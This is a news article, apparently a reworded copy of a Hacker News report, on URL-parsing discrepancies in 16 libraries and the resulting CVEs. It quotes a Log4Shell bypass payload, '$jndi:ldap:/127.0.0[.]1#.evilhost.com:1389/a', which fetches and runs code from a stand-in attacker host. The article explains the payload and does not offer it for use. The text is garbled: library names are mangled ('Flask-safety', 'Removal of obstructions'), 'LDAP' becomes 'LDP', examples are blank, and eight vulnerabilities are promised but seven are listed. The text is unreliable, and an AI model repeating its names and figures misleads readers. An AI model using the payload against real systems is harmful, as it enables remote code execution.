Inconsistencies and ambiguities have been discovered in 16 distinct Uniform Resource Locator (URL) parsing libraries, which might be exploited to evade validations and open the door to a wide range of attack vectors.
“The URL parsing confusion can cause unexpected behaviour in software (e.g., web application), and could be exploited by threat actors to cause denial-of-service conditions, information leaks, or possibly conduct remote code execution attacks,” the researchers wrote in a report shared with The Hacker News.
Differences in how the parsing libraries interpret a URL request could represent a substantial risk for consumers, given that URLs are a basic mechanism by which resources — whether locally or on the web — can be sought and retrieved.
A good example is the critical Log4Shell flaw in the widely used Log4j logging framework, which results in a JNDI lookup that connects to an adversary-controlled server and executes arbitrary Java code when a malicious attacker-controlled string is evaluated as and when it’s being logged by a vulnerable application.
Although the Apache Software Foundation (ASF) quickly implemented a fix to address the flaw, it was soon discovered that the mitigations could be circumvented by a specially crafted input in the format “$jndi:ldap:/127.0.0[.]1#.evilhost.com:1389/a,” which allowed remote JNDI lookups to be used to execute code once more.
“This bypass derives from the fact that two (!) URL parsers were utilised inside the JNDI lookup process, one for verifying the URL and the other for obtaining it, and the Authority changes depending on how each parser treats the Fragment section (#) of the URL,” the researchers explained.
When the input is treated as a regular HTTP URL, the Authority component — the combination of the domain name and port number — ends when the fragment identifier is encountered, whereas when the input is treated as an LDAP URL, the parser assigns the entire “127.0.0[.]1#.evilhost.com:1389” as the Authority because the LDP URL specification does not account for the fragment.
Indeed, one of the two key causes for the eight vulnerabilities being discovered was the use of multiple parsers, with the other being concerns emerging from discrepancies when the libraries follow various URL requirements, essentially presenting an exploitable gap.
The dissonance varies from URLs with backslashes (“”), an unusual amount of slashes (e.g., https:///www.example[.]com), or URL encoded data (” percent “) to URLs that lack a URL scheme, which could be abused to acquire remote code execution, as well as denial-of-service (DoS) and open-redirect phishing assaults.
The following is a list of the eight vulnerabilities detected, all of which have been addressed by their respective maintainers:
The SIP Stack of Belledonne (C, CVE-2021-33056)
XI Nagios (PHP, CVE-2021-37352)
Flask-safety (Python, CVE-2021-23385)
Flask-security-as-well (Python, CVE-2021-32618)
Unchained flask (Python, CVE-2021-23393)
Flask-User is a user interface for the Flask programming language (Python, CVE-2021-23401)
Removal of obstructions (Ruby, CVE-2021-23435)
“Different parsing primitives could lead to a variety of real-world attack scenarios,” the researchers added. “It is vital to completely understand which parsers are involved in the entire process [and] the variations between parsers, whether it their leniency, how they read different faulty URLs, and what types of URLs they support,” according to the researchers.